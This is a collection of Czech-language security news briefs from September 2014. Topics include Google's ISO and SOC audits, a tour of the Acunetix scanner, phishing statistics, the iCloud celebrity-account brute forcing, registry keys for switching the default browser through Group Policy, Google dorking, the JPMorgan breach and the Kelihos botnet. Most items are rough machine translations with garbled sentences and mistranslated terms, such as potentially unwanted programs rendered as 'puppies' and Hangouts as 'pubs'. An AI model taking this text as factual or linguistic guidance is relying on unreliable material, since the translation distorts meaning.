měl být na pozoru neobvyklé aktivity na jejich účtech, a pečlivě prohlédnout každý email obdrželi od své banky, jak by se mohlo jednat o podvod. A krátce předtím, než byly odkryty na porušení zákazníci JPMorgan byl na přijímacím konci odborně řemeslně nebezpečných e-mailů zasílaných údajně bankou.


Google ujišťuje podnikové uživatele s nezávislým bezpečnostní audity
4.9.2014 Bezpečnost
Google dělá vše, co je v jejích silách, aby obnovila důvěru v jeho produktů, že někteří uživatelé přišli v důsledku odhalení Edward Snowden je asi NSA špionáže.

Mezi tyto kroky bylo lepší zprávu o transparentnosti, snahu použít šifrování po celou dobu jejich on-line majetku, jakož i zvýšené námaze v boji s požadavky vlády USA pro přístup k datům uložených se a shromážděných společností. poslední krok byl oznámen ve středu, a je zaměřena především na firemní zákazníky. "Jsme hrdí na to, oznamujeme, jsme získali aktualizovaný ISO 27001 certifikát a SOC 2 a SOC 3 Typ zprávy o auditu II, které jsou nejvíce široce uznávané, mezinárodně uznávaných nezávislých zpráv dodržování bezpečnosti, "Eran Feigenbaum, ředitel zabezpečení Google Apps sdílet na svém blogu. "Tyto audity obnovení našeho pokrytí pro Google Apps pro firmy a vzdělávání, jakož i Google Cloud platformy, a jsme rozšířili rozsah, aby zahrnoval Google+ a hospůdky. Chcete-li ji jednodušší pro každý ověřit naši bezpečnost, jsme nyní publikování náš aktualizovaný ISO 27001 certifikát a novou zprávu SOC3 auditu poprvé, na naší bezpečnostní stránce Google Enterprise . " Feigenbaum poznamenat, že transparentnost je nezbytná vydělávat a udržení důvěry zákazníků, a jeden způsob, jak dosáhnout, aby je dostat nezávislí auditoři zkoumat ovládací prvky v jejich systémů a operací na pravidelném základě. Dodal také, že Google zaměstnává 450 na plný úvazek, inženýry, aby údaje zákazníků v bezpečí.


Bližší pohled na Acunetix Web Vulnerability Scanner
4.9.2014 Bezpečnost
Acunetix Web Vulnerability Scanner automaticky zkontroluje, zda vaše webové aplikace pro SQL Injection, XSS a další webové zranitelnosti. Vlastnosti:

AcuSensor Technology
SQL injection a XSS testování
Penetrační testování nástroje, jako je Editor HTTP a HTTP Fuzzer
Vizuální záznam makra je testování webových formulářů a heslem chráněné oblasti snadno
Podpora stránek s CAPTCHA, single sign-on a 2FA mechanismů
Zpravodajské zařízení, včetně zpráv o dodržování předpisů PCI
Multi-threaded scanner, který zpracovává tisíce stránek s lehkostí
Pásové detekuje webové typ serveru, jazyk aplikace a smartphone optimalizované stránky.
Acunetix prochází a analyzuje různé typy webových stránek, včetně HTML5, SOAP a AJAX
Port skenuje webový server a běží bezpečnostní kontroly proti síťových služeb běžících na serveru.
Zde je prohlídka softwaru, klepněte na každý obrázek pro zobrazení v plné verzi.

To je hlavní rozhraní Acunetix Web Vulnerability Scanner (WVS). Odtud může uživatel přistupovat nejběžnější úkoly jsou k dispozici v Acunetix WVS.

Nové skenování pomocí Průvodce - Z hlavního rozhraní, uživatel může kliknout na novou úlohu skenování spustit Průvodce vytvořením Scan. To bude vodítkem pro uživatele o vytvoření nové hledání, a umožní uživateli vyladit nastavení skenování. Výchozí nastavení je možné použít pro rychlé spuštění skenování z uzlu Web Scanner.

Vytvoření Přihlásit Sequence - jeden z kroků v Průvodci Nové skenování umožňuje konfiguraci skenování heslem chráněných oblastí na webové stránce. To lze provést konfiguraci pouľívá standardní přihlaąovací proceduru s snadné použití standardní přihlaąovací proceduru Recorder. Na rozdíl od záznamu přihlašovací akce, je možné určit omezeným odkazy, jako je například Odhlášení odkazy. Přihlášení Sequence rekordér pokračujte automaticky zjistí, který sezení jsou stále aktivní a uložit to do standardní přihlaąovací proceduru. Přihlášení Sequence bude uložen pro budoucí prověřování na stejném místě.

Hotové Výsledky testu - Po naskenování stránky, Acunetix WVS poskytuje výsledky testů pořadí výstrahy zabezpečení podle závažnosti. Kromě toho, Acunetix WVS poskytuje Výstrahy Souhrn v podokně podrobností. Uživatel může rozšířit každý typ záznamu, k získání více informací o konkrétní záznam.

XSS zranitelnosti - Toto je příklad Cross Site Scripting (XSS) zranitelnost. Ve střehu údaje poskytnout popis zranitelnosti spolu s informací o tom, jak byla chyba objevena. Upozornění také poskytuje sanační rady, jak vyřešit specifický problém, a odkazy na webové stránky třetích stran a klasifikace s využitím CVE, cwE a CVSS.

SQLi ukazující SQL dotazu s AcuSensor - Tato výstraha ukazuje detekci SQL Injection zranitelnosti. V tomto případě, Acunetix WVS poskytuje přesné umístění zranitelnosti (řádek 51 v product.php) a SQL dotaz, který byl proveden, kdy byla zjištěna chyba. Všechny tyto informace jsou poskytovány AcuSensor -, který je instalován na webových stránkách a působí jako agent pro Acunetix. AcuSensor umožňuje skenování přesnější, poskytuje dodatečné informace během kontroly, a má za následek méně falešných poplachů.

Znalostní báze se zobrazuje seznam souborů vstupy - na rozdíl od skenování zranitelnosti, Acunetix WVS poskytuje další informace, jako například seznam externích hostitelů, seznam e-mailových adres zjištěných na webových stránkách, nebo v seznamu souborů se vstupy, který je uveden na screenshot. Kromě toho, Acunetix WVS zobrazí také struktura webu, které je detekováno při procházení webových stránek.

Struktura stránky zobrazující detailní informace o vybraném souboru - uživatel může kliknout na libovolný soubor ve struktuře souborů získat podrobné informace o konkrétním souboru.

Acunetix manuální testování nástroje - sada bezpečnostních nástrojů webových jsou rovněž zahrnuty v Acunetix, umožňuje uživateli provést další testy ručně. Většina zranitelnosti objevené během skenování Acunetix WVS lze exportovat do příslušné manuální testovací nástroj, který umožňuje další ověření zranitelnosti.
 

Plánovač - Použití webového rozhraní Acunetix plánovače web skeny lze naplánovat, které budou zahájeny ve vhodnou dobu, jako jsou nízké dopravní období. Kontrolu lze naplánována buď kontinuálně, nebo na denní týdenní nebo měsíční rozvrh.
 

Reporter - Pomocí Acunetix WVS Reporter, může uživatel vytvářet různé zprávy od výkonného souhrnné zprávy podrobných zpráv pro vývojáře. Kromě toho Reporter nástroj může generovat zprávy dosvědčující splnění různých norem a předpisů, jako je PCI DSS 3.0, HIPAA, ISO 27001 a další.


Útočníci zaměření šifrovací měnu a čerpacích stanic
4.9.2014 Šifrování
On-line platební služby a krypto-měn místa jsou terčem phisherů. Počet phishingových útoků zůstala vysoká, a ve druhém čtvrtletí roku 2014 viděl, druhý nejvyšší počet phishingových útoků někdy nahrávala v čtvrtina od APWG začal sledovat čtvrtletní období v roce 2008.

APWG zjištěna v průměru 42.793 nových phishingových útoků za měsíc ve druhém čtvrtletí. Počet cílů mírně poklesl z 1Q 2014 rok-přes-rok, počet cílů klesl o 17 procent z 639 pozorované ve 2. čtvrtletí roku 2013 na 531 viděl ve 2. čtvrtletí roku 2014. několik typů cílů bylo napadeno více než v roce minulost. Častěji napadeni byli stále on-line a alternativní platební služby. Příklady zahrnují rakouské bezhotovostních plateb místě PayLife, Hong Kong-založený alternativní platební systém Perfect Money a Payoneer, finanční služby pro obchodníky internetové bázi, která umožňuje uživatelům převádět peníze a přijímat platby přes re-zatížitelné předplacené debetní karty MasterCard. Útoky proti zavedené poskytovatele ponořil. "Jsme rovněž svědky uptick v oblasti phishingových útoků proti uživatelům Bitcoin míst, zejména peněženka služeb Blockchain a výměna webu Coinbase," řekl Greg Aaron, prezident Illumintel a APWG výzkumný pracovník. "Počet útoků proti nim zůstane celkově malá, ale budeme i nadále sledovat to, jak Bitcoin nadále získat přijetí ze strany maloobchodníků a spotřebitelů." Útoky proti maloobchod / servisní místa také rostl, 11,5-16,5 procent všech phishingových útoků. Útočníci falešnou tyto stránky, protože shromažďovat čísla kreditních karet a další užitečné pověření od svých uživatelů. druhém čtvrtletí také viděl v poslední době nárůst šíření PUP (potenciálně nežádoucí programy), jako je spyware a adware. Člen společnosti APWG PandaLabs hlásí, že mláďata se šíří prostřednictvím šíření softwarových bundlers: programy, které instalují štěňata na počítačích spolu s programy, které uživatel skutečně chce nainstalovat. Celkově lze říci, trojské koně zůstává nejčastějším typem malwaru. Úplná zpráva je k dispozici zde .


70% IT profesionálů, zažít týdenní phishingové útoky
4.9.2014 Phishing
69 procent IT profesionálů zkušeností phishingových útoků nejméně jednou týdně, s údaji o zákazníkovi citován nejčastěji jako typ dat napadeni, následuje finanční informace, podle HP. Sedm z 10 útoků vzniklé v rámci sítě obvodu stonku z malware -infected hostitel zdůrazňuje význam přijetí vrstvený přístup k zabezpečení blokovat podezřelé komunikace na každém místě v síti, od obvodu do středu. "Organizace jsou stále za úkol chránit své sítě před pokročilé cílené útoky, ve skutečnosti, to je pravděpodobné, že většina prostředí již byla porušena systémy infikované malwarem, "řekl Frank Mong, viceprezident Solutions, Enterprise Security Products, HP. "Je důležité, aby odborníci v oblasti IT pochopit, jak útočníci se snaží prorazit v síti, a mít důvěru ve svou schopnost zmírnit útoky, když každé druhé záležitosti." na Ipsos Observer on-line průzkumu více než 200 IT profesionálů, které vycházejí ve Spojených státech , studie také přinesla následující výsledky:

Přibližně šest z 10 útoků pramení z nebezpečného komunikaci s velení a řízení webu, a více než polovina využívají softwarové zranitelnosti. Největší nebezpečí vzhledem k těmto novým útoky jsou primárně v rámci datového centra, mobilní a pobočkové sítě.
Z dotazovaných organizací, Čína je uveden nejčastěji jako země původu pro externí síťové útoky, následuje Rusko a Spojené státy.
Osmdesát pět procent respondentů uvedla obavy o nedovoleném sdílení souborů a používání aplikací, které nepocházejí z povolání; 63 procent se týkají zaměstnanců, kteří navštíví webové stránky pro dospělé, pouze na podnikové síti.
Zhruba sedm z 10 tvrzení, že sociální média je druh zneužívání dochází v podnikové síti.
V případě porušení sítě, 67 procent respondentů uvedeny údaje o zákaznících jsou s největší pravděpodobností napaden, následuje finanční informace společnosti (63 procent). Další údaje na rizika zahrnují korporátní duševního vlastnictví (59 procent) a údajů o zaměstnancích (49 procent).
Jako společnosti hledají, aby přijaly softwaru definované sítě (SDN), 54 procent je uvedeno síťové správy jako nejvyšší znepokojení, zatímco 44 procent se týká s útočníkem ohrožení SDN regulátor.
V průměru, podniky utrácejí cca 2,6 milionů dolarů ročně na zabezpečení sítě, a více než 60 procent IT profesionálů dotazovaných očekává zvýšení výdajů v příštím roce.
"Organizace jsou stále za úkol chránit své sítě před pokročilé cílené útoky, ve skutečnosti, je pravděpodobné, že většina prostředí již byla porušena systémy infikované malwarem," řekl Frank Mong, viceprezident Solutions, Enterprise Security Products, HP. "Je důležité, aby odborníci v oblasti IT pochopit, jak útočníci se snaží prorazit v síti, a mít důvěru ve svou schopnost zmírnit útoky kdy každý druhý záležitosti."


Apple iCloud bezpečnostních incidentů
3.9.2014 Incidnety

Je tu spousta zájmu v nedávné iCloud incidentu, kde byly ohroženy zřejmě několik "celebrit" účty. Omlouvám se říci, že to není fáma. To je také něco, co mohlo a mělo být zabráněno. Ukazuje se, že API pro "Find My iPhone" app neměl ochranu proti útoku hrubou silou. To, v kombinaci s první pár set řádků společného hesla slovníku (často stáhnout jako jméno souboru "500 nejhorších hesel") vedlo v některých cílových účtů budou kompromitována. A samozřejmě, jakmile heslo účtu úspěšně uhodl všechna data iCloud pro daný účet k dispozici útočníky. Takže žádná velká věda, ne uber hackerské schopnosti. Jen jeden vystaven útoku, základní kódování dovednosti a některé vytrvalost.

Poté, co prošel tohoto souboru hesel, opravdu zajímalo, kolik lidí používající některou z těchto hesel oceňují svá data na prvním místě.

Apple rychle opravil chybu, tak to už není ve hře (pokud váš účet byl ohrožen před zmírňování a jste nezměnili heslo). Kód je na GitHub, pokud máte zájem.

To jen posiluje společné téma, které - mírně řečeno - důvěřivý osobní údaje jednoduchých hesel se nedoporučuje. Pokud nemůžete používat složitá hesla (pro mě, to je větší než 15 znaků) nebo nemají druhý faktor, pak nepoužívejte službu.


"Smrt" internetových služeb
3.9.2014 IT
Ne, nemluvíme o 1940 v literatuře dnes - jsem četl, jak se mnozí, že Microsoft plánuje konečně zastavit úctyhodný MSN Messenger chat služby. Připadá mi to zajímavé, že tisk je propagují, že MSN má málo uživatelů odešel. To může být pravda, v naší komunitě, a já Nebylo by ?? T pochyb o tom, že téměř každý demografický se vzdálil od MSN na další chatu služby jako SMS na telefonech, Facebook, Skype, Twitter nebo cokoliv jiného.

Ale možná, že Toronto je internet stojaté vody nebo tak něco ?? pro každé IPS vstát nebo výtok filtru konfigurovat, v každé společnosti I ?? budete stále najít hrstku uživatelů MSN Messenger. I když vidíme obecně nízkou aktivitu na hlavní port používaný MSN (1863), stále vidíme špičky v provozu - https://isc.sans.edu/port.html?port=1863

Do internetové služby nikdy zemřít přirozeně? Zdá se mi, že lidé lpí na tom, co vědí jak zuby nehty, a jen vzdát služeb, když ?? znovu ukončen násilně.

Jako penetrační tester může tyto starší služby je zlatý důl. Pro mě, starší služby (není k vyzvednutí na jednom služby, zejména), poměrně často prostého textu, takže pokud můžete dostat čisté zachycování paketů pak máte velmi dobrou šanci na pověření sklizni. A víme, že na to, že lidé budou mít tendenci znovu použít pověření - userid jsou snadno odvodit, ale pokud můžete sklízet hesla na jednu službu, máte skvělou šanci na re-používat je, aby ohrozit jiné aplikace nebo služby .

Opět, nejsem si jistý, jestli jsem to jen já, ale také mám tendenci vidět, že uživatelé těchto starších typů "spotřebitel" aplikací, jako je tato, z nějakého důvodu se zdá být seskupeny v horních vrstvách mnoha firem. Jinými slovy, některé z nejlepších cílů (politicky alespoň) se za použití některé z nejvíce snadno napadených aplikací.

Heslo znovu použít, preferování staré / známé aplikace na nové, a "user clustering" kolem starší aplikace - Vidíš to stejné trendy?

Už xkcd si to pravé? http://xkcd.com/1305/

Prosím, využijte náš formulář komentáře a dejte nám vědět, co vidíte, a to jak na MSN Messenger nebo jiných "starých" internetových aplikací!


Uhýbání Browser Zero dny - Změna Orga je výchozí prohlížeč centrálně
3.9.2014 Zabezpečení
V nedávném příběhu o " co je to systémový administrátor dělat? ", jsme navrhli, že protože naše prohlížeče Zdá se, že se střídají s nulovými dnů v poslední době, že správce systému by měl mít zavedeny postupy pro přípravu, když jejich firemní standardní prohlížeč má zásadní chybu zabezpečení, která ještě nemá opravu. Správci by měli být schopni "tlačit" ven změnu pro jejich uživatele komunity výchozím prohlížeči během několika minut nula den je potvrzena.

Takže - Jak přesně byste to udělat v Active Directory domény?

Za prvé, má plochu nebo v nabídce Start, která používá HTTP: // nebo https: // - obvykle zaměřena na jeden nebo více podnikových aplikací. To není neobvyklé, že také firemní webové aplikace v nabídce Start. Ujistěte se, že žádný z těchto odkazů poukázat na programy navzájem, jen URI. To dostane lidi ve zvyku děrování tuto klávesovou zkratku každé ráno (nebo nebo s jí Auto-Start pro ně), jejich spouštění z na pravou nohu - s prohlížečem, který jste zvolili pro ně. S lidé začínají svůj prohlížeč skutečným odkaz na spustitelný maří účel nastavení výchozí hodnoty.

Ukazuje se, že jako výchozí prohlížeč lze změnit aktualizací pouhých 5 klíčů registru - preferovanou aplikaci pro htm a html soubory, stejně jako preferovanou aplikaci pro FTP, HTTP a HTTPS.

============ Klíče registru pro Firefox - reg-ff.reg ==============

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice]
"Progid"="FirefoxHTML"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice]
"Progid"="FirefoxHTML"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\ftp\UserChoice]
"Progid"="FirefoxURL"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice]
"Progid"="FirefoxURL"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice]
"Progid"="FirefoxURL"

============ Klíče registru pro aplikaci Internet Explorer - reg-Ie.reg ==============

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice]
"Progid"="IE.AssocFile.HTM"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice]
"Progid"="IE.AssocFile.HTM"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\ftp\UserChoice]
"Progid"="IE.FTP"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice]
"Progid"="IE.HTTP"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice]
"Progid"="IE.HTTPS"

============ Klíče registru pro Chrome - reg-goo.reg ==============

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice]
"Progid"="ChromeHTML"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice]
"Progid"="ChromeHTML"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\ftp\UserChoice]
"Progid"="ChromeHTML"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice]
"Progid"="ChromeHTML"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice]
"Progid"="ChromeHTML"

================================================== =

Můžete kopat a najít spoustu dalších klíčů registru, které bude mít vliv na prohlížeč, ale to 5 bude hřebík většinu věcí ve spěchu - což je cíl. Můžete také najít více REG klíče, které změní výchozí prohlížeč, ale to jsou klíče stanovené ovládacím panelu (v systému Windows 7 tak jako tak), takže pro mě jsou to pravděpodobně nejbezpečnější klíče - ty, že pro dnešek alespoň budou s největší pravděpodobností pracovat nejspolehlivěji pro většinu prostředí.

Takže, co je nejjednodušší způsob, jak tlačit tato nastavení ven? Existuje několik způsobů, jak jít. Za prvé, uložte na výše uvedené tři různé textové bázi REG soubory

Nejjednodušší způsob, jak v mé knize je aktualizovat spuštění každého - v Zásady skupiny, přidejte následující Konfigurace uživatele / Nastavení systému Windows / Skripty (přihlášení / odhlášení)

registru evidovat / s prohlížeč chrome.reg (nebo REG je podle toho, co váš cíl).

Trik pak je dostat lidi do odhlásit a přihlásit - doufejme, že nutí lidi, aby odhlásit každý den nastavením zabrat odhlášení (dobrá věc, aby zvážila, pokud nejste, že dnes dělá), takže pokud jste si své změny než lidé obvykle začínají, budou se vaše aktualizace.

Pokud potřebujete, aby se zasadila na to s GPO v polovině toku můžete nastavit registru klíče přímo v zásadách skupiny, v rámci GPO> Konfigurace uživatele> Předvolby> Nastavení systému Windows> Registry

Microsoft vydává "správnou cestu" nastavit výchozí prohlížeč na několika různých stránkách, ale je to obvykle zahrnuje importu nastavení ze známého správné stanice To může být problém, pokud máte více operačních systémů, nebo chcete více skriptu řízený přístup.

Existuje jistě mnoho dalších způsobů, jak tlačit nastavení s využitím Zásad skupiny (pomocí ADM / ADMX soubory například), nebo skriptování pomocí Sysinternals nebo příkazy PowerShell. Přístup Sysinternals má spoustu odvolání, protože mnoho administrátoři již Sysinternals "jít opravit" přístup již ve svém toolbelt. Powershell se líbí, protože je to nový nástroj svist-bang-lesklý, ale spousta administrátorů se stále učí tento jazyk, takže to nemusí spadat do "to udělat rychle" kbelíku tak pěkně. ADMS bude absolutně dělat svou práci dobře - neměl jsem čas na slepení a ADM nebo ADMX soubor pro toto, ale dát mu šanci v příštích několika dnech (pokud jeden z našich čtenářů mi bije na to, že je! )

Po nastavení, každý prohlížeč lze nastavit pomocí zásad skupiny pomocí ADM od dodavatele nebo open-source nebo ADMX souboru. Importovat soubor prodejce ADM (X) do GPO, a budete moci nastavit nebo omezit prohlížeče třetí strany stejně snadno, jako vy IE.

Tento článek byl určen spíše jako soubor "rychlé a špinavé" způsoby, jak tuto změnu pro velké množství vaší uživatelské komunity ve spěchu. Pokud máte čistý skript nebo soubor ADM, který dělá tuto práci ve více elegantním způsobem, než jsem popsal, prosím, sdílet pomocí našeho formuláře komentář!


Netflix otevřených zdrojů nástroje pro detekci plánované útoky
3.9.2014 Počítačový útok
Tvorba svému slovu, aby open source mnoho ze svých interně vyvinutých nástrojů a knihoven, Netflix vydala tři nové nástroje, které umožňují bezpečnostní týmy dávat pozor na jednání založené na Internetu týkající se možných útoků proti infrastruktuře své organizace, ať už je to DDoS útoky nebo jakýkoliv jiný druh.

Nástroje jsou pojmenovány Scumblr, útržkovité a Workflowable. Scumblr je aplikace, která vlečné sítě na webu pro příspěvky a diskuse, které se zmiňují o útoky nebo jiný obsah zájmů. "Scumblr obsahuje sadu vestavěných knihoven, které umožňují vytváření vyhledá běžných lokalit, jako je Google, Facebook a Twitter. Pro ​​jiné stránky, je snadné vytvořit pluginy pro výkon cílené vyhledávání a vrátí výsledky, "Andy Hoernecke a Scott Behrens z bezpečnostního týmu Netflix Cloud sdíleny v pondělí. "Jakmile budete mít nastavení Scumblr, můžete spustit vyhledávání ručně nebo automaticky na opakujícím se základě." Scumblr používá Workflowable nastavit pracovní postupy spouštěné rozdílnou povahou výsledků vyhledávání, automatizaci - alespoň částečně - reakce obránce. Sketchy může být také integrován s Scumblr. Jejím cílem je, aby se automaticky pořizovat snímky obrazovky nalezených rozhovorů a prohlášení, oškrábejte text a uložit HTML tak, aby iv případě, že to všechno dostane odstraněny včas, screenshoty zůstávají jako důkaz, a bezpečnostní analytici si prohlédnout výsledky Scumblr bez nutnosti návštěvy potenciálně škodlivé weby přímo. Pro ​​více informací o nástrojích a odkazy na stažení stránky, podívejte se na týmu Netflix příspěvek .


DHS naléhá na webové stránky, správci, aby se minimalizovalo riziko, Google hacking
3.9.2014 Hrozby

Je to všeobecně známý fakt, že Google Search je cenným nástrojem pro útočníky, kteří hledají způsob, jak do informačních systémů organizací. "Google hacking" byl použit pro let o průniku testery a bezpečnostních výzkumníků. Ars Technica uvádí , že americké ministerstvo pro vnitřní bezpečnost a FBI nedávno rozeslal oznámení na policii, veřejné bezpečnosti a bezpečnostních sil, varoval je o "Dorkingu Google ", tj hacking (klikněte na screenshotu vidět celý dokument): "Tím, hledání specifických typů a klíčových slov souborů, škodlivých kybernetických herců můžete najít informace, jako jsou uživatelská jména a hesla, e-mailové seznamy citlivých dokumentů, detaily bankovních účtů, a webové stránky zranitelnosti, "vysvětluje upozornění. "Například, jednoduchá obsluha: klíčové slovo syntax, jako filetype: xls intext: uživatelské jméno ve standardním vyhledávacího pole bude načítat tabulky aplikace Excel obsahující uživatelská jména mohou navíc volně k dispozici on-line nástroje spustit automatické skenování. použití více ňouma dotazů. " Oznámení rovněž zmiňuje dva případy, kdy "Dorkingu" bylo použito k porušení webových stránek a upozorní čtenáře na existenci Diggity projektu , bezplatné testování penetrace nástroje Suite, která umožňuje uživatelům / útočníci automatizovat ňouma dotazy Google. Google hacking by neměl být takový úspěšný postup v případě, vlastníci a správci stránek se postaral zabezpečit své webové stránky, ale skutečnost je taková, že mnoho ne, a občas by mělo být připomenuto, jak to udělat. Se zvyšující se "pozornost" vláda a vymáhání práva webové stránky jsou přijímání z hacktivists v posledních několika letech, bude seznam opatření ke zmírnění rizika, že dokument obsahuje určitě přijde vhod.


FBI vyšetřuje banky porušení JPMorgan, USA
3.9.2014 Incidenty
V návaznosti na zprávy, že několik velkých Americké finanční ústavy, které měly své sítě narušit hackery tento měsíc, FBI a tajné služby byl připojen oficiální vyšetřování. Zatím jediný pojmenovaný cíl je JPMorgan Chase & Co, ale podle NYT , nejméně další čtyři banky byly zasaženy. Útočníci se podařilo exfiltrate GB citlivých dat, jako jsou kontrola a úspory zákazníků informace o účtu. Podle agentury Bloomberg , v jednom konkrétním případě útočníci využili nulového dne zranitelnost k získání opora v systémech společnosti. Podobný Zero Day byl nedávno použit v útocích na evropské banky. To je ještě neznámé, které by mohly být za útoky. Někteří bezpečnostní experti tvrdí, že jejich sofistikovanost mohou poukazovat na státem podporovaných hackery, a tam byly spekulace, že ruští hackeři mohou být na vině, případně spouštění útoky jako forma odplaty za ekonomických sankcí namířených proti Rusku v důsledku eskalace konfliktu na Ukrajině. Je také možné, že alespoň v JPMorgan případě útoku bylo částečně motivováno pomstou jako na začátku tohoto roku, banka zablokovala platby z ruského velvyslanectví na pobočky v USA schválený banky. Od útoků proti USA a evropského bankovního sektoru se v posledních několika měsících vzrostly, to je také docela možné, že tyto útoky jsou jen pokračováním předchozí, a může být zaměřen na shromažďování informací, které mohou být později zneužity ukrást peníze. "Firmy z našich Velikost bohužel zkušenosti kybernetických útoků téměř každý den, "uvedl mluvčí JPMorgan. "Máme několik vrstev obrany proti jakýmkoli hrozbám a neustále sledovat hladinu podvodům." Ale zdá se, že ani to nestačí, když tváří v tvář s odhodlaným útočníků.


70% financí apps citlivé na vstupní validaci útoky
3.9.2014 Počítačový útok
Rostoucí počet narušení dat a bezpečnostní incidenty mohou být přímo spojeny s nízkou kvalitou kódu, podle CAST.

Data odhaluje financí a maloobchodu aplikace jsou nejvíce náchylné k narušení dat , 70 procent z maloobchodní a 69 procent žádostí o finanční služby prokázáno, že vstupní údaje porušování ověření. To je zejména pokud jde o, s ohledem na množství osobních a finančních údajů o zákaznících často drženy v aplikací v těchto odvětvích. CAST EVP Lev Lesokhin který vedl analýza bezpečnosti řekl: "Tak dlouho, jak to organizace obětovat kvalitu softwaru a zabezpečení, v zájmu splnění nereálné plány, můžeme očekávat, že více vysoce postavených útoky, které vedou k expozici a využívání citlivých dat zákazníků. Podniků, které zpracovávají zákazníka finanční údaje mají odpovědnost za zlepšování kvality softwaru a snížit nerozhoduje jen chránit své podnikání operačního rizika jejich aplikace, ale nakonec své zákazníky. " validace vstupu dostal velkou pozornost v letošním roce díky Heartbleed chyba , která vystavena více než 60 procent serverů na internetu je k vniknutí z důvodu nesprávného ověření vstupu v podobě chybějících hranic zkontrolovat realizaci rozšíření TLS srdce. Od 21.června 2014, odhaduje se, že 309.197 veřejné webové servery stále zůstal zranitelný. Kromě toho nedávná zpráva ukázala, že vstupní validace útoky byly využívány v 80 procentech útoků proti aplikací loni v maloobchodě sami - s možná největší obětí je rekordní eBay porušení dat , což má za následek hackeři získat přístup k více než 145 milionů . Záznamy uživatelů a federální vyšetřování CAST také zjistili, že - na rozdíl od veřejného mínění - vláda IT měl nejvyšší procento aplikací bez jakýchkoliv porušení vstupní validace (61 procent), zatímco nezávislí dodavatelé softwaru přišel v mrtvém poslední (12 procent bez porušení). Ještě překvapivější, údaje ukazují, že odvětví finančních služeb má nejvyšší počet překročení vstupní validace na použití (224), i když jejich aplikací v průměru, jsou jen z poloviny tak složitého, jako největší aplikace naskenovaného.


Názor: Cloud, dobrý sluha, ale... však to znáte

3.9.2014 Cloud
Ke skandálu uniklých fotek jakýchsi celebrit se v posledních dnech vyjadřuje snad každý, kdo má klávesnici, a asi neexistuje nikdo s připojením k internetu, kdo by o něm neslyšel. Ani já však nebudu výjimkou a také se k tomu trochu vyjádřím, i když téma spoře oděných hvězdiček použiji jen jako takovou berličku.

Používání cloudu k zálohování citlivých dat, ať už například soukromých fotografií nebo citlivých pracovních dokumentů, se v poslední době stalo v podstatě samozřejmostí, a z těch, kteří žádnou z cloudových služeb nepoužívají, se plíživě stávají v očích většiny paranoidní podivíni, skoro na stejné úrovni podivínství jako ti, co se vyhýbají sociálním sítím. Jak je to možný? Vždyť se to všude synchronizuje a máš všechno po ruce, jak bez toho můžeš žít? To s sebou furt všechno taháš na flashkách, nebo jako to jako děláš?

Trochu přeháním, ale pokud nedojde k nějakému nepředvídatelnému zvratu, za pár let budou takové reakce docela normální, na čemž není nic špatného – jedná se zkrátka o další stupeň pokroku, který s sebou stejně jako všechno nese jak pozitiva, tak i určité hrozby. S nimi se však nelze vyrovnat tím, že pokrok budeme ignorovat.

V současnosti jsou však obavy těch, kteří se cloudu vyhýbají, na místě. A ještě spíš v případě, kdy přihlédneme k té spoustě uživatelů, kteří se k používání cloudu dostali pouze zakoupením chytrého telefonu a na bezpečnost věcí v něm uložených nedbají zkrátka proto, že nevědí, že by měli.

Zálohují si do cloudu data a protože o něm moc nevědí, používají staré dobré heslo typuheslonebo 123456a pak se diví, že jsou jejich soukromé fotografie nebo v horším případě průmyslová tajemství zaměstnavatele, veřejně dostupné na internetu.

Cloud se nedá odsoudit s tím, že je příliš nebezpečný, stejně jako u většiny nástrojů však jeho bezpečnost záleží na tom, kdo ho používá.


Hlavu do oprátky: Operátoři botnetu Kelihos úspěšně rekrutují dobrovolníky

2.9.2014 Viry
Uživatelé počítačů – typicky jde o Rusy - si nechají zavirovat počítač, aby se mohli přidat k údajnému útoku na vládní instituce zemí, které se podílejí na sankcích vůči Rusku. Botnet Kelihos tak neustále roste.
V Rusku a na Ukrajině probíhají spamové kampaně, slibující uživatelům počítačů možnost účastnit se na tzv. DDoS útocích (spočívající v zahlcení cílových serverů nezvladatelnou vlnou dotazů) na západní vládní instituce. Zprávu o tom přinesla informační služba IDG News Service.

Aktuální nábor ve skutečnosti představuje elegantní formu rozšiřování botnetu zvaného Kelihos. Jde o síť ovládaných počítačů budovanou již od roku 2010; cílem operátorů však není bojovat za vznešené ideály, nýbrž vydělávat peníze.

Botnet, který se vyznačuje velmi odolnou strukturou (má tzv. peer-to-peer topologii, kde každý počítač je schopen ovládat ostatní počítače v síti) se ve své minulosti podílel na masovém rozesílání spamu nebo těžbě i krádežích bitcoinů. Nadšenci, kteří by chtěli alespoň na internetu bojovat za Rusko, místo toho budou bojovat za zisky kyberzločinců.

Operátoři botnetu Kelihos těží z toho, že dobrovolnické DDoS útoky v Rusku v minulosti opravdu probíhaly, například během Rusko - Gruzínského konfliktu v roce 2008.


California Telefon kill-switch zákon by mohl vést ke zneužívání
2.9.2014 Mobil
